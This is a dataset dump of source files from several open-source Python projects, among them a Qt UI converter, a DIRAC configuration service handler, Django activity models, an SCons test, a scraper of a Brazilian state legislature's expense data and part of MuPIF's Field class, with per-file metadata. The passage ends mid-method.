Dataset schema (15 columns; dtype followed by the observed min/max lengths, value range, or number of classes):

    column            dtype           range / classes
    repo_name         stringlengths   5 to 92
    path              stringlengths   4 to 221
    copies            stringclasses   19 values
    size              stringlengths   4 to 6
    content           stringlengths   766 to 896k
    license           stringclasses   15 values
    hash              int64           -9,223,277,421,539,062,000 to 9,223,102,107B
    line_mean         float64         6.51 to 99.9
    line_max          int64           32 to 997
    alpha_frac        float64         0.25 to 0.96
    autogenerated     bool            1 class
    ratio             float64         1.5 to 13.6
    config_test       bool            2 classes
    has_no_keywords   bool            2 classes
    few_assignments   bool            1 class
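The records below follow this schema. As a minimal, hypothetical sketch (not part of the original dump), this is how records with these columns could be iterated and filtered in Python; the dataset path "user/python-code-dump" is a placeholder assumption, and the filter thresholds are arbitrary examples built from the numeric columns above.

    # Hypothetical usage sketch: iterate records that follow the schema above.
    # "user/python-code-dump" is a placeholder, not the real dataset name.
    from datasets import load_dataset

    ds = load_dataset("user/python-code-dump", split="train", streaming=True)

    for record in ds:
        # Skip files flagged as autogenerated or as config/test code.
        if record["autogenerated"] or record["config_test"]:
            continue
        # Example quality filters using the numeric columns (thresholds are arbitrary).
        if record["line_max"] > 500 or record["alpha_frac"] < 0.3:
            continue
        print(record["repo_name"], record["path"], record["license"], len(record["content"]))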

repo_name: MalloyDelacroix/DownloaderForReddit
path: Tools/ui_converter.py
copies: 1
size: 5130
content:
#!/usr/bin/env python import sys import os import subprocess class Converter: base_ui_path = os.path.relpath('Resources/ui_files') base_out_path = os.path.relpath('DownloaderForReddit/guiresources') def __init__(self, ui_file): self.ui_file = ui_file self.callable_methods = [ 'about', 'add_reddit_object', 'core_settings', 'database_dialog', 'database_settings', 'display_settings', 'download_settings', 'export_wizard', 'notification_settings', 'output_settings', 'filter_input', 'filter_widget', 'main_window', 'object_info', 'object_settings', 'quick_filter_settings', 'reddit_object_dialog', 'schedule_settings', 'settings', 'update_dialog', 'invalid_dialog', 'existing_names_dialog', ] def run(self): if self.ui_file == 'list': self.list_methods() self.ui_file = input('GUI file name (or number): ') try: name = self.get_method() method = getattr(self, name) method() print('Conversion successful') except AttributeError: print(f'Command not recognized. Choices are: ') self.list_methods() def get_method(self): try: index = int(self.ui_file) return self.callable_methods[index] except ValueError: return self.ui_file def list_methods(self): for x, y in enumerate(self.callable_methods): print(f'{x}: {y}') def convert(self, name, *sub_paths): original = os.getcwd() os.chdir(os.path.dirname(original)) # change directories so that all file paths in created file are correct in_path = self.get_in_path(name, *sub_paths) out_path = self.get_out_path(name, *sub_paths) command = f'pyuic5 {in_path} -o {out_path}' # print(command) subprocess.run(command) os.chdir(original) def get_in_path(self, name, *sub_paths): name = f'{name}.ui' return os.path.join(self.base_ui_path, *sub_paths, name) def get_out_path(self, name, *sub_paths): name = f'{name}_auto.py' return os.path.join(self.base_out_path, *sub_paths, name) def about(self): name = 'about_dialog' self.convert(name) def add_reddit_object(self): name = 'add_reddit_object_dialog' self.convert(name) def main_window(self): name = 'downloader_for_reddit_gui' self.convert(name) def reddit_object_dialog(self): name = 'reddit_object_settings_dialog' self.convert(name) def update_dialog(self): name = 'update_dialog' self.convert(name) def database_dialog(self): name = 'database_dialog' self.convert(name, 'database_views') def filter_input(self): name = 'filter_input_widget' self.convert(name, 'database_views') def filter_widget(self): name = 'filter_widget' self.convert(name, 'database_views') def core_settings(self): name = 'core_settings_widget' self.convert(name, 'settings') def database_settings(self): name = 'database_settings_widget' self.convert(name, 'settings') def display_settings(self): name = 'display_settings_widget' self.convert(name, 'settings') def download_settings(self): name = 'download_settings_widget' self.convert(name, 'settings') def export_wizard(self): name = 'export_wizard' self.convert(name) def notification_settings(self): name = 'notification_settings_widget' self.convert(name, 'settings') def output_settings(self): name = 'output_settings_widget' self.convert(name, 'settings') def quick_filter_settings(self): name = 'quick_filter_settings_widget' self.convert(name, 'settings') def schedule_settings(self): name = 'schedule_settings_widget' self.convert(name, 'settings') def settings(self): name = 'settings_dialog' self.convert(name, 'settings') def object_info(self): name = 'object_info_widget' self.convert(name, 'widgets') def object_settings(self): name = 'object_settings_widget' self.convert(name, 'widgets') def invalid_dialog(self): 
name = 'invalid_reddit_object_dialog' self.convert(name) def existing_names_dialog(self): name = 'existing_names_dialog' self.convert(name) def user_auth_wizard(self): name = 'user_auth_wizard' self.convert(name) def main(): try: command = sys.argv[1] except IndexError: print('No class specified') command = input('GUI Name (or number): ') converter = Converter(command) converter.run() if __name__ == '__main__': main()

license: gpl-3.0
hash: 8,101,822,332,021,041,000
line_mean: 26.433155
line_max: 116
alpha_frac: 0.571345
autogenerated: false
ratio: 3.868778
config_test: false
has_no_keywords: false
few_assignments: false

repo_name: duncan-r/SHIP
path: ship/utils/fileloaders/fileloader.py
copies: 1
size: 2254
content:
""" Summary: Main file loader for the API. This offers convenience methods to make it simple to load any type of file from one place. Author: Duncan Runnacles Created: 01 Apr 2016 Copyright: Duncan Runnacles 2016 TODO: Updates: """ from __future__ import unicode_literals from ship.utils import utilfunctions as uuf from ship.utils.fileloaders import tuflowloader from ship.utils.fileloaders import iefloader from ship.utils.fileloaders import datloader import logging logger = logging.getLogger(__name__) """logging references with a __name__ set to this module.""" class FileLoader(object): """ """ def __init__(self): """ """ self._known_files = {'ief': iefloader.IefLoader, 'tcf': tuflowloader.TuflowLoader, 'dat': datloader.DatLoader, 'ied': datloader.DatLoader} self.warnings = [] def loadFile(self, filepath, arg_dict={}): """Load a file from disk. Args: filepath (str): the path to the file to load. arg_dict={}(Dict): contains keyword referenced arguments needed by any of the loaders. E.g. the TuflowLoader can take some scenario values. Returns: The object created by the individual file loaders. E.g. for .dat files this will be an IsisUnitCollection. See the individual ALoader implementations for details of return types. Raises: AttributeError: if the file type is not tcf/dat/ief/ied. See Also: :class:'ALoader' :class:'IefLoader' :class:'TuflowLoader' :class:'DatLoader' """ ext = uuf.fileExtensionWithoutPeriod(filepath) if not ext.lower() in self._known_files: logger.error('File type %s is not currently supported for loading' % ext) raise AttributeError('File type %s is not currently supported for loading' % ext) loader = self._known_files[ext]() contents = loader.loadFile(filepath, arg_dict) self.warnings = loader.warnings del loader return contents

license: mit
hash: 366,836,191,615,290,940
line_mean: 26.82716
line_max: 93
alpha_frac: 0.60071
autogenerated: false
ratio: 4.285171
config_test: false
has_no_keywords: false
few_assignments: false

repo_name: arrabito/DIRAC
path: ConfigurationSystem/Service/ConfigurationHandler.py
copies: 1
size: 3918
content:
""" The CS! (Configuration Service) """ __RCSID__ = "$Id$" from DIRAC.Core.Utilities.ReturnValues import S_OK, S_ERROR from DIRAC.ConfigurationSystem.private.ServiceInterface import ServiceInterface from DIRAC.Core.DISET.RequestHandler import RequestHandler from DIRAC.Core.Utilities import DErrno gServiceInterface = None gPilotSynchronizer = None def initializeConfigurationHandler(serviceInfo): global gServiceInterface gServiceInterface = ServiceInterface(serviceInfo['URL']) return S_OK() class ConfigurationHandler(RequestHandler): """ The CS handler """ types_getVersion = [] def export_getVersion(self): return S_OK(gServiceInterface.getVersion()) types_getCompressedData = [] def export_getCompressedData(self): sData = gServiceInterface.getCompressedConfigurationData() return S_OK(sData) types_getCompressedDataIfNewer = [basestring] def export_getCompressedDataIfNewer(self, sClientVersion): sVersion = gServiceInterface.getVersion() retDict = {'newestVersion': sVersion} if sClientVersion < sVersion: retDict['data'] = gServiceInterface.getCompressedConfigurationData() return S_OK(retDict) types_publishSlaveServer = [basestring] def export_publishSlaveServer(self, sURL): gServiceInterface.publishSlaveServer(sURL) return S_OK() types_commitNewData = [basestring] def export_commitNewData(self, sData): global gPilotSynchronizer credDict = self.getRemoteCredentials() if 'DN' not in credDict or 'username' not in credDict: return S_ERROR("You must be authenticated!") res = gServiceInterface.updateConfiguration(sData, credDict['username']) if not res['OK']: return res # Check the flag for updating the pilot 3 JSON file if self.srv_getCSOption('UpdatePilotCStoJSONFile', False) and gServiceInterface.isMaster(): if gPilotSynchronizer is None: try: # This import is only needed for the Master CS service, making it conditional avoids # dependency on the git client preinstalled on all the servers running CS slaves from DIRAC.WorkloadManagementSystem.Utilities.PilotCStoJSONSynchronizer import PilotCStoJSONSynchronizer except ImportError as exc: self.log.exception("Failed to import PilotCStoJSONSynchronizer", repr(exc)) return S_ERROR(DErrno.EIMPERR, 'Failed to import PilotCStoJSONSynchronizer') gPilotSynchronizer = PilotCStoJSONSynchronizer() return gPilotSynchronizer.sync() return res types_writeEnabled = [] def export_writeEnabled(self): return S_OK(gServiceInterface.isMaster()) types_getCommitHistory = [] def export_getCommitHistory(self, limit=100): if limit > 100: limit = 100 history = gServiceInterface.getCommitHistory() if limit: history = history[:limit] return S_OK(history) types_getVersionContents = [list] def export_getVersionContents(self, versionList): contentsList = [] for version in versionList: retVal = gServiceInterface.getVersionContents(version) if retVal['OK']: contentsList.append(retVal['Value']) else: return S_ERROR("Can't get contents for version %s: %s" % (version, retVal['Message'])) return S_OK(contentsList) types_rollbackToVersion = [basestring] def export_rollbackToVersion(self, version): retVal = gServiceInterface.getVersionContents(version) if not retVal['OK']: return S_ERROR("Can't get contents for version %s: %s" % (version, retVal['Message'])) credDict = self.getRemoteCredentials() if 'DN' not in credDict or 'username' not in credDict: return S_ERROR("You must be authenticated!") return gServiceInterface.updateConfiguration(retVal['Value'], credDict['username'], updateVersionOption=True)

license: gpl-3.0
hash: -4,709,197,104,656,305,000
line_mean: 33.368421
line_max: 114
alpha_frac: 0.710822
autogenerated: false
ratio: 4.085506
config_test: true
has_no_keywords: false
few_assignments: false

repo_name: lunixbochs/nullstatic
path: gen.py
copies: 1
size: 2581
content:
#!/usr/bin/env python2
from collections import defaultdict
from datetime import date, datetime
from email.Utils import formatdate
import frontmatter
import jinja2
import markdown
import os
import sys
import time
import yaml

@jinja2.contextfilter
def _render(context, data):
    return env.from_string(data['source']).render(**context)

def datekey(entry):
    d = entry.get('date', date.min)
    if isinstance(d, date):
        d = datetime.combine(d, datetime.min.time())
    return d

def strip_path(base, path):
    return path.replace(base, '', 1).lstrip(os.sep)

def gen(base, out):
    env = jinja2.Environment(trim_blocks=True, lstrip_blocks=True, loader=jinja2.FileSystemLoader(base))
    env.filters['render'] = _render
    env.filters['markdown'] = markdown.markdown
    env.filters['date'] = lambda x: x.strftime('%Y-%m-%d')
    env.filters['rfc822'] = lambda x: formatdate(time.mktime(x.timetuple()))
    env.filters['datesort'] = lambda x: sorted(x, key=lambda k: datekey(k))

    tree = defaultdict(list)
    for root, dirs, files in os.walk(base):
        root = strip_path(base, root)
        for name in files:
            if name.endswith('.j2'):
                path = os.path.join(base, root, name)
                post = frontmatter.load(path)
                data = {'name': name.rsplit('.', 1)[0], 'src': path, 'source': post.content}
                data.update(post)
                data['ext'] = data.get('ext', (os.path.splitext(data.get('render', ''))[1] if not '.' in data['name'] else ''))
                data['url'] = data.get('url', data['name']) + data['ext']
                data['dst'] = os.path.join(out, os.path.dirname(strip_path(base, path)), data['url'])
                tree[root].append(data)

    for template in (t for ts in tree.values() for t in ts):
        source, render = map(template.get, ('source', 'render'), (None, ''))
        if source is not None:
            if render:
                source = open(os.path.join(base, render), 'r').read().decode('utf-8')
            ctx = {cat: templates for cat, templates in tree.items() if cat}
            ctx.update(tree=tree, **template)
            data = env.from_string(source).render(**ctx)
            dstdir = os.path.dirname(template['dst'])
            if not os.path.exists(dstdir):
                os.makedirs(dstdir)
            with open(template['dst'], 'w') as o:
                o.write(data.encode('utf-8'))

if __name__ == '__main__':
    import sys
    if len(sys.argv) != 3:
        print('Usage: gen.py <src> <out>')
        sys.exit(1)
    gen(*sys.argv[1:])

license: mit
hash: -623,981,896,369,554,700
line_mean: 37.522388
line_max: 127
alpha_frac: 0.586594
autogenerated: false
ratio: 3.506793
config_test: false
has_no_keywords: false
few_assignments: false

repo_name: owais/django-simple-activity
path: simple_activity/models.py
copies: 1
size: 1965
content:
from django.db import models
from django.utils.timezone import now
from django.conf import settings
from django.contrib.contenttypes.models import ContentType

from filtered_contenttypes.fields import FilteredGenericForeignKey
from django_pgjson.fields import JsonBField

from .managers import ActionManager
from . import settings as app_settings
from . import registry


def _default_action_meta():
    return {}


class Action(models.Model):
    item_type = models.ForeignKey(ContentType, related_name='actions')
    item_id = models.PositiveIntegerField()
    item = FilteredGenericForeignKey('item_type', 'item_id')

    target_type = models.ForeignKey(ContentType, blank=True, null=True,
                                    related_name='target_actions')
    target_id = models.PositiveIntegerField(blank=True, null=True)
    target = FilteredGenericForeignKey('target_type', 'target_id')

    actor = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='activity')
    verb = models.CharField(max_length=23, choices=registry.as_model_choices())
    published = models.DateTimeField(auto_now_add=True)
    meta = JsonBField(default=_default_action_meta, blank=True)

    objects = ActionManager()

    class Meta:
        abstract = app_settings.get('ACTION_MODEL') != 'simple_activity.Action'
        ordering = ('-published',)

    @classmethod
    def add_action(klass, verb, actor, item, target=None, published=None, meta={}):
        if not registry.is_valid(verb):
            raise ValueError('`{}` not a valid verb.'.format(verb))
        published = published or now()
        create_kwargs = {'actor': actor, 'item': item, 'verb': verb.code}
        if target:
            create_kwargs['target'] = target
        create_kwargs['published'] = published
        klass.objects.create(**create_kwargs)

    @property
    def verb_object(self):
        return registry.get_from_code(self.verb)

license: bsd-2-clause
hash: 2,345,284,087,180,824,000
line_mean: 34.727273
line_max: 80
alpha_frac: 0.672774
autogenerated: false
ratio: 4.216738
config_test: false
has_no_keywords: false
few_assignments: false

repo_name: EmanueleCannizzaro/scons
path: test/Clean/Option.py
copies: 1
size: 2620
content:
#!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#

__revision__ = "test/Clean/Option.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"

"""
Verify that {Set,Get}Option('clean') works correctly to control
cleaning behavior.
"""

import os

import TestSCons

_python_ = TestSCons._python_

test = TestSCons.TestSCons()

test.write('build.py', r"""
import sys
contents = open(sys.argv[2], 'rb').read()
file = open(sys.argv[1], 'wb')
file.write(contents)
file.close()
""")

test.write('SConstruct', """
B = Builder(action = r'%(_python_)s build.py $TARGETS $SOURCES')
env = Environment(BUILDERS = { 'B' : B })
env.B(target = 'foo.out', source = 'foo.in')
mode = ARGUMENTS.get('MODE')
if mode == 'not':
    assert not GetOption('clean')
if mode == 'set-zero':
    assert GetOption('clean')
    SetOption('clean', 0)
    assert GetOption('clean')
if mode == 'set-one':
    assert not GetOption('clean')
    SetOption('clean', 1)
    assert GetOption('clean')
""" % locals())

test.write('foo.in', '"Foo", I say!\n')

test.run(arguments='foo.out MODE=not')
test.must_match(test.workpath('foo.out'), '"Foo", I say!\n')

test.run(arguments='-c foo.out MODE=set-zero')
test.must_not_exist(test.workpath('foo.out'))

test.run(arguments='foo.out MODE=none')
test.must_match(test.workpath('foo.out'), '"Foo", I say!\n')

test.run(arguments='foo.out MODE=set-one')
test.must_not_exist(test.workpath('foo.out'))

test.pass_test()

# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:

license: mit
hash: -4,647,620,131,027,711,000
line_mean: 29.465116
line_max: 94
alpha_frac: 0.711832
autogenerated: false
ratio: 3.308081
config_test: true
has_no_keywords: false
few_assignments: false

repo_name: olhoneles/olhoneles
path: montanha/management/commands/collectors/algo.py
copies: 1
size: 12094
content:
# -*- coding: utf-8 -*- # # Copyright (©) 2010-2013 Estêvão Samuel Procópio # Copyright (©) 2010-2013 Gustavo Noronha Silva # Copyright (©) 2013 Marcelo Jorge Vieira # Copyright (©) 2014 Wilson Pinto Júnior # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import json import operator import os import re import rows from datetime import datetime from io import BytesIO from cStringIO import StringIO from cachetools import Cache, cachedmethod from django.core.files import File from basecollector import BaseCollector from montanha.models import ( Institution, Legislature, PoliticalParty, Legislator, ExpenseNature, ArchivedExpense, Mandate ) class ALGO(BaseCollector): TITLE_REGEX = re.compile(r'\d+ - (.*)') MONEY_RE = re.compile(r'([0-9.,]+)[,.]([0-9]{2})$') def __init__(self, *args, **kwargs): super(ALGO, self).__init__(*args, **kwargs) self.base_url = 'http://al.go.leg.br' self.institution, _ = Institution.objects.get_or_create( siglum='ALGO', name=u'Assembléia Legislativa do Estado de Goiás' ) self.legislature, _ = Legislature.objects.get_or_create( institution=self.institution, date_start=datetime(2015, 1, 1), date_end=datetime(2018, 12, 31) ) self.list_of_legislators_cache = Cache(1024) self.expenses_nature_cached = {} def _normalize_party_siglum(self, siglum): names_map = { 'SDD': 'Solidariedade', } return names_map.get(siglum, siglum) def update_legislators(self): url = self.base_url + '/deputado/' html = self.retrieve_uri(url, post_process=False, force_encoding='utf-8') rows_xpath = u'//tbody/tr' fields_xpath = { u'nome': u'./td[position()=1]/a/text()', u'url': u'./td[position()=1]/a/@href', u'party': u'./td[position()=2]/text()', u'telefone': u'./td[position()=3]/text()', u'fax': u'./td[position()=4]/text()', u'email': u'./td[position()=5]/a[position()=1]/img/@title', } table = rows.import_from_xpath(BytesIO(html.encode('utf-8')), rows_xpath, fields_xpath) url_regex = re.compile(r'.*id/(\d+)') email_regex = re.compile(r'Email: (.*)') for row in table: _id = url_regex.match(row.url).group(1) email = None if row.email: email = email_regex.match(row.email).group(1).strip() party_siglum = self._normalize_party_siglum(row.party) party, party_created = PoliticalParty.objects.get_or_create( siglum=party_siglum ) self.debug(u'New party: {0}'.format(party)) legislator, created = Legislator.objects.get_or_create(name=row.nome) legislator.site = self.base_url + row.url legislator.email = email legislator.save() if created: self.debug(u'New legislator: {0}'.format(legislator)) else: self.debug(u'Found existing legislator: {0}'.format(legislator)) self.mandate_for_legislator(legislator, party, original_id=_id) @classmethod def parse_title(self, title): if '-' in title: match = self.TITLE_REGEX.search(title) if match: return match.group(1).encode('utf-8') return title.encode('utf-8') @classmethod def parse_money(self, value): match = self.MONEY_RE.search(value) if match: return float('{0}.{1}'.format( 
match.group(1).replace('.', '').replace(',', ''), match.group(2) )) else: raise ValueError('Cannot convert {0} to float (money)'.format(value)) def get_parlamentar_id(self, year, month, name): legislators = self.get_list_of_legislators(year, month) legislators = [i for i in legislators if i['nome'] == name] if not legislators: return return legislators[0]['id'] @cachedmethod(operator.attrgetter('list_of_legislators_cache')) def get_list_of_legislators(self, year, month): url = '{0}/transparencia/verbaindenizatoria/listardeputados?ano={1}&mes={2}'.format( self.base_url, year, month, ) data = json.loads(self.retrieve_uri(url, force_encoding='utf8').text) return data['deputados'] def find_data_for_month(self, mandate, year, month): parlamentar_id = self.get_parlamentar_id(year, month, mandate.legislator.name) if not parlamentar_id: self.debug( u'Failed to discover parlamentar_id for year={0}, month={1}, legislator={2}'.format( year, month, mandate.legislator.name, ) ) raise StopIteration url = '{0}/transparencia/verbaindenizatoria/exibir?ano={1}&mes={2}&parlamentar_id={3}'.format( self.base_url, year, month, parlamentar_id ) data = self.retrieve_uri(url, force_encoding='utf8') if u'parlamentar não prestou contas para o mês' in data.text: self.debug(u'not found data for: {0} -> {1}/{2}'.format( mandate.legislator, year, month )) raise StopIteration container = data.find('div', id='verba') if not container: self.debug('div#verba not found') table = container.find('table', recursive=False) if not table: self.debug('table.tabela-verba-indenizatoria not found') raise StopIteration group_trs = table.findAll('tr', {'class': 'verba_titulo'}) for tr in group_trs: budget_title = self.parse_title(tr.text) budget_subtitle = None while True: tr = tr.findNext('tr') if not tr: break tr_class = tr.get('class') if tr.get('class') == 'verba_titulo': break elif tr_class == 'info-detalhe-verba': for data in self.parse_detale_verba(tr, budget_title, budget_subtitle): yield data elif tr_class == 'subtotal': continue elif len(tr.findAll('td')) == 3: tds = tr.findAll('td') budget_subtitle = self.parse_title(tds[0].text) next_tr = tr.findNext('tr') break_classes = ('subtotal', 'info-detalhe-verba', 'verba_titulo') if next_tr.get('class') in break_classes: continue value_presented = self.parse_money(tds[1].text) value_expensed = self.parse_money(tds[2].text) if not value_expensed or not value_presented: continue data = { 'budget_title': budget_title, 'budget_subtitle': budget_subtitle, 'value_presented': value_presented, 'date': '1/%d/%d' % (month, year), 'value_expensed': value_expensed, 'number': 'Sem número' } self.debug(u'Generated JSON: {0}'.format(data)) yield data def parse_detale_verba(self, elem, budget_title, budget_subtitle): rows_xpath = u'//tbody/tr' fields_xpath = { u'nome': u'./td[position()=1]/text()', u'cpf_cnpj': u'./td[position()=2]/text()', u'date': u'./td[position()=3]/text()', u'number': u'./td[position()=4]/text()', u'value_presented': u'./td[position()=5]/text()', u'value_expensed': u'./td[position()=6]/text()', } table = rows.import_from_xpath( BytesIO(str(elem)), rows_xpath, fields_xpath) for row in table: data = dict(row.__dict__) data.update({ 'budget_title': budget_title, 'budget_subtitle': budget_subtitle, 'cpf_cnpj': self.normalize_cnpj_or_cpf(row.cpf_cnpj), 'value_presented': self.parse_money(row.value_presented), 'value_expensed': self.parse_money(row.value_expensed), }) self.debug(u'Generated JSON: {0}'.format(data)) yield data def get_or_create_expense_nature(self, name): if name not 
in self.expenses_nature_cached: try: nature = ExpenseNature.objects.get(name=name) except ExpenseNature.DoesNotExist: nature = ExpenseNature(name=name) nature.save() self.expenses_nature_cached[name] = nature return self.expenses_nature_cached[name] def update_data_for_month(self, mandate, year, month): for data in self.find_data_for_month(mandate, year, month): nature = self.get_or_create_expense_nature( '{0}: {1}'.format(data['budget_title'], data['budget_subtitle']) ) name = data.get('nome') or 'Sem nome' no_identifier = u'Sem CPF/CNPJ ({0})'.format(name) cpf_cnpj = data.get('cpf_cnpj', no_identifier) supplier = self.get_or_create_supplier(cpf_cnpj, name) date = datetime.strptime(data['date'], '%d/%m/%Y') expense = ArchivedExpense( number=data.get('number', ''), nature=nature, date=date, value=data['value_presented'], expensed=data['value_expensed'], mandate=mandate, supplier=supplier, collection_run=self.collection_run, ) expense.save() def update_images(self): mandates = Mandate.objects.filter(legislature=self.legislature, legislator__picture='') headers = { 'Referer': self.base_url + '/deputado/', 'Origin': self.base_url, } deputado_data = self.retrieve_uri(self.base_url + '/deputado/', headers=headers) for mandate in mandates: leg = mandate.legislator found_text = deputado_data.find(text=re.compile(leg.name)) if not found_text: self.debug(u'Legislator not found in page: {0}'.format(mandate.legislator.name)) continue tr = found_text.findParents('tr')[0] tds = tr.findAll('td') detail_path = tds[0].find('a')['href'] detail_url = self.base_url + detail_path detail_data = self.retrieve_uri(detail_url, headers=headers) photo_container = detail_data.find('div', {'class': re.compile(r'foto')}) photo_url = photo_container.find('img')['src'] photo_data = self.retrieve_uri(self.base_url + photo_url, post_process=False, return_content=True) photo_buffer = StringIO(photo_data) photo_buffer.seek(0) leg.picture.save(os.path.basename(photo_url), File(photo_buffer)) leg.save() self.debug('Saved %s Image URL: {0}'.format(leg.name, photo_url)) else: self.debug('All legislators have photos')

license: agpl-3.0
hash: -3,635,771,197,065,837,000
line_mean: 34.532353
line_max: 110
alpha_frac: 0.552934
autogenerated: false
ratio: 3.617066
config_test: false
has_no_keywords: false
few_assignments: false

repo_name: mupif/mupif
path: mupif/Field.py
copies: 1
size: 42683
content:
# # MuPIF: Multi-Physics Integration Framework # Copyright (C) 2010-2015 Borek Patzak # # Czech Technical University, Faculty of Civil Engineering, # Department of Structural Mechanics, 166 29 Prague, Czech Republic # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, # Boston, MA 02110-1301 USA # from builtins import range from builtins import object from . import Cell from . import FieldID from . import ValueType from . import BBox from . import APIError from . import MupifObject from . import Mesh from .Physics import PhysicalQuantities from .Physics.PhysicalQuantities import PhysicalQuantity from numpy import array, arange, random, zeros import numpy import copy import Pyro4 from enum import IntEnum import logging log = logging.getLogger() try: import cPickle as pickle # faster serialization if available except: import pickle # import logging - never use it here, it causes cPickle.PicklingError: Can't pickle <type 'thread.lock'>: attribute # lookup thread.lock failed # debug flag debug = 0 class FieldType(IntEnum): """ Represent the supported values of FieldType, i.e. FT_vertexBased or FT_cellBased. """ FT_vertexBased = 1 FT_cellBased = 2 @Pyro4.expose class Field(MupifObject.MupifObject, PhysicalQuantity): """ Representation of field. Field is a scalar, vector, or tensorial quantity defined on a spatial domain. The field, however is assumed to be fixed at certain time. The field can be evaluated in any spatial point belonging to underlying domain. Derived classes will implement fields defined on common discretizations, like fields defined on structured/unstructured FE meshes, FD grids, etc. .. automethod:: __init__ .. automethod:: _evaluate """ def __init__(self, mesh, fieldID, valueType, units, time, values=None, fieldType=FieldType.FT_vertexBased, objectID=0, metaData={}): """ Initializes the field instance. :param Mesh.Mesh mesh: Instance of a Mesh class representing the underlying discretization :param FieldID fieldID: Field type (displacement, strain, temperature ...) :param ValueType valueType: Type of field values (scalar, vector, tensor). Tensor is a tuple of 9 values. It is changed to 3x3 for VTK output automatically. 
:param Physics.PhysicalUnits units: Field value units :param Physics.PhysicalQuantity time: Time associated with field values :param values: Field values (format dependent on a particular field type, however each individual value should be stored as tuple, even scalar value) :type values: list of tuples representing individual values :param FieldType fieldType: Optional, determines field type (values specified as vertex or cell values), default is FT_vertexBased :param int objectID: Optional ID of problem object/subdomain to which field is related, default = 0 :param dict metaData: Optionally pass metadata for merging """ super(Field, self).__init__() self.mesh = mesh self.fieldID = fieldID self.valueType = valueType self.time = time self.uri = None # pyro uri; used in distributed setting # self.log = logging.getLogger() self.fieldType = fieldType self.objectID = objectID if values is None: if self.fieldType == FieldType.FT_vertexBased: ncomponents = mesh.getNumberOfVertices() else: ncomponents = mesh.getNumberOfCells() self.value = zeros((ncomponents, self.getRecordSize())) else: self.value = values if PhysicalQuantities.isPhysicalUnit(units): self.unit = units else: self.unit = PhysicalQuantities.findUnit(units) self.setMetadata('Units', self.unit.name()) self.setMetadata('Type', 'mupif.Field.Field') self.setMetadata('Type_ID', str(self.fieldID)) self.setMetadata('FieldType', str(fieldType)) self.setMetadata('ValueType', str(self.valueType)) self.updateMetadata(metaData) @classmethod def loadFromLocalFile(cls, fileName): """ Alternative constructor which loads instance directly from a Pickle module. :param str fileName: File name :return: Returns Field instance :rtype: Field """ return pickle.load(open(fileName, 'rb')) def getRecordSize(self): """ Return the number of scalars per value, depending on :obj:`valueType` passed when constructing the instance. :return: number of scalars (1,3,9 respectively for scalar, vector, tensor) :rtype: int """ if self.valueType == ValueType.Scalar: return 1 elif self.valueType == ValueType.Vector: return 3 elif self.valueType == ValueType.Tensor: return 9 else: raise ValueError("Invalid value of Field.valueType (%d)." % self.valueType) def getMesh(self): """ Obtain mesh. :return: Returns a mesh of underlying discretization :rtype: Mesh.Mesh """ return self.mesh def getValueType(self): """ Returns ValueType of the field, e.g. scalar, vector, tensor. :return: Returns value type of the receiver :rtype: ValueType """ return self.valueType def getFieldID(self): """ Returns FieldID, e.g. FID_Displacement, FID_Temperature. :return: Returns field ID :rtype: FieldID """ return self.fieldID def getFieldIDName(self): """ Returns name of the field. :return: Returns fieldID name :rtype: string """ return self.fieldID.name def getFieldType(self): """ Returns receiver field type (values specified as vertex or cell values) :return: Returns fieldType id :rtype: FieldType """ return self.fieldType def getTime(self): """ Get time of the field. :return: Time of field data :rtype: Physics.PhysicalQuantity """ return self.time def evaluate(self, positions, eps=0.0): """ Evaluates the receiver at given spatial position(s). 
:param positions: 1D/2D/3D position vectors :type positions: tuple, a list of tuples :param float eps: Optional tolerance for probing whether the point belongs to a cell (should really not be used) :return: field value(s) :rtype: Physics.PhysicalQuantity with given value or tuple of values """ # test if positions is a list of positions if isinstance(positions, list): ans = [] for pos in positions: ans.append(self._evaluate(pos, eps)) return PhysicalQuantity(ans, self.unit) else: # single position passed return PhysicalQuantity(self._evaluate(positions, eps), self.unit) def _evaluate(self, position, eps): """ Evaluates the receiver at a single spatial position. :param tuple position: 1D/2D/3D position vector :param float eps: Optional tolerance :return: field value :rtype: tuple of doubles .. note:: This method has some issues related to https://sourceforge.net/p/mupif/tickets/22/ . """ cells = self.mesh.giveCellLocalizer().giveItemsInBBox(BBox.BBox([c-eps for c in position], [c+eps for c in position])) # answer=None if len(cells): if self.fieldType == FieldType.FT_vertexBased: for icell in cells: try: if icell.containsPoint(position): if 